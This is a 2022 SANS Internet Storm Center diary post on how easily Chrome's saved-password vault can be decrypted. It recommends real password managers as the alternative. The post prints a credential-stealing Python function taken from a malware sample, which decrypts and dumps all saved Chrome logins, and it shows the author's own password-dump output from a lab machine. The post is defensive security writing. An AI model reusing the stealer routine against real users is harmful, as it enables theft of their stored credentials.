Threat Level: green Handler on Duty: Xavier Mertens

SANS ISC: SANS.edu Internet Storm Center - SANS Internet Storm Center SANS.edu Internet Storm Center


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

Latest Diaries

Use Your Browser Internal Password Vault... or Not?

Published: 2022-05-17
Last Updated: 2022-05-17 09:05:52 UTC
by Xavier Mertens (Version: 1)
1 comment(s)

Passwords... a so hot topic! Recently big players (Microsoft, Apple & Google) announced that they would like to suppress (or, at least, reduce) the use of classic passwords[1]. In the meantime, they remain the most common way to authenticate users against many online services. Modern Browsers offer lightweight password management tools ("vaults") that help users to save their passwords in a central repository. So they don't have to remember them, and they follow the golden rule that we, infosec people, are recommending for a long time: to not share passwords across services. But it is really safe?

I'm involved in a security incident where some administrative accounts for web applications have been probably leaked. During the investigations, I wrote a quick YARA rule to search for the suspicious accounts across files on the developers' computers. And I found a lot of them stored in the Chrome password databases. The default path for this file is:

%USERPROFILE%\AppData\Local\Google\Chrome\User Data\default|Login Data

This file is an SQLite database. Hopefully, passwords stored in this file are encrypted but it's pretty simple to decrypt them. But the AES key that is used to encrypt the passwords is stored in a JSON file:

%USERPROFILE%\AppData\Local\Google\Chrome\User Data\Local State

I won't explain here how to decode this key and use it to decrypt all passwords. This is pretty straightforward to be performed in Python. Here is an example of dumping passwords from a lab Windows machine with Chrome:

C:\Users\xavier\Lab>python dumppass.py
Origin URL: https://selfoss.xxxxxxxxxxxx/
Action URL: https://selfoss.xxxxxxxxxxxx/
Username: xavier
Password: xxxxxxxx
Creation date: 2022-05-17 08:26:16.687562
Last Used: 2022-05-17 08:26:13.094214
==================================================
Origin URL: https://centreon.xxxxxxxxxxxxxxxxxxxxxxxxxx/
Action URL: https://centreon.xxxxxxxxxxxxxxxxxxxxxxxxxx/index.php
Username: admin
Password: xxxxxxxxxxxxxxxxxxxx
Creation date: 2022-05-17 08:49:44.385977
Last Used: 2022-05-17 08:49:41.002207
==================================================

If it's so easy to extract passwords from Chrome, many malware samples also implement this technique and exfiltrate your passwords. Here is a sample found this morning on VT:

def grabPassword(self):
    master_key = self.get_master_key(
        self.appdata+'\\Google\\Chrome\\User Data\\Local State')
    login_db = self.appdata+'\\Google\\Chrome\\User Data\\default\\Login Data'
    login = self.dir+self.sep+"Loginvault1.db"

    shutil.copy2(login_db, login)
    conn = sqlite3.connect(login)
    cursor = conn.cursor()
    with open(self.dir+"\\Google Passwords.txt", "w", encoding="cp437", errors='ignore') as f:
        cursor.execute(
            "SELECT action_url, username_value, password_value FROM logins")
        for r in cursor.fetchall():
            url = r[0]
            username = r[1]
            encrypted_password = r[2]
            decrypted_password = self.decrypt_val(
                encrypted_password, master_key)
            if url != "":
                f.write(
                    f"Domain: {url}\nUser: {username}\nPass: {decrypted_password}\n\n")
    cursor.close()
    conn.close()
    os.remove(login)

My recommendation is to not store your password in these browser vaults but use a real password manager instead! Most of them have plugins available to work with all common browsers and provide the same ease of use! Stay safe!

[1] https://www.bleepingcomputer.com/news/security/microsoft-apple-and-google-to-support-fido-passwordless-logins/

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

1 comment(s)

If you have more information or corrections regarding our diary, please share.

Recent Diaries

Apple Patches Everything
May 16th 2022
23 hours ago by Johannes (0 comments)

Why is my Honeypot a Russian Certificate Authority?
May 16th 2022
1 day ago by Johannes (0 comments)

Wireshark 3.6.5 Released
May 15th 2022
2 days ago by DidierStevens (0 comments)

Quick Analysis Of Phishing MSG
May 14th 2022
3 days ago by DidierStevens (0 comments)

From 0-Day to Mirai: 7 days of BIG-IP Exploits
May 13th 2022
4 days ago by Johannes (0 comments)

Microsoft May 2022 Patch Tuesday
May 13th 2022
4 days ago by Renato (0 comments)

When Get-WebRequest Fails You
May 12th 2022
5 days ago by Rob VandenBrink (0 comments)

TA578 using thread-hijacked emails to push ISO files for Bumblebee malware
May 11th 2022
6 days ago by Brad (0 comments)

View All Diaries →

Latest Discussions

Dshield Sensor
created Jun 8th 2021
11 months ago by Rick (0 replies)

API port data
created Apr 25th 2021
1 year ago by JJ (1 reply)

RSS feed containing non-XML compatible characters
created Apr 14th 2021
1 year ago by Anonymous (1 reply)

Handler's Diary (Full text) RSS Feeds stopt working due to a typo
created Mar 5th 2021
1 year ago by bas.auer@auerplace.nl (0 replies)

port_scan issue in Snort3
created Feb 23rd 2021
1 year ago by astraea (0 replies)

View All Forums →

Latest News

Top Diaries

Mixed VBA & Excel4 Macro In a Targeted Excel Sheet
Jan 22nd 2022
3 months ago by Xme (0 comments)

A Quick CVE-2022-21907 FAQ
Jan 14th 2022
4 months ago by Johannes (0 comments)

Method For String Extraction Filtering
Apr 9th 2022
1 month ago by DidierStevens (0 comments)

CinaRAT Delivered Through HTML ID Attributes
Feb 11th 2022
3 months ago by Xme (0 comments)

Obscure Wininet.dll Feature?
Jan 21st 2022
3 months ago by Xme (0 comments)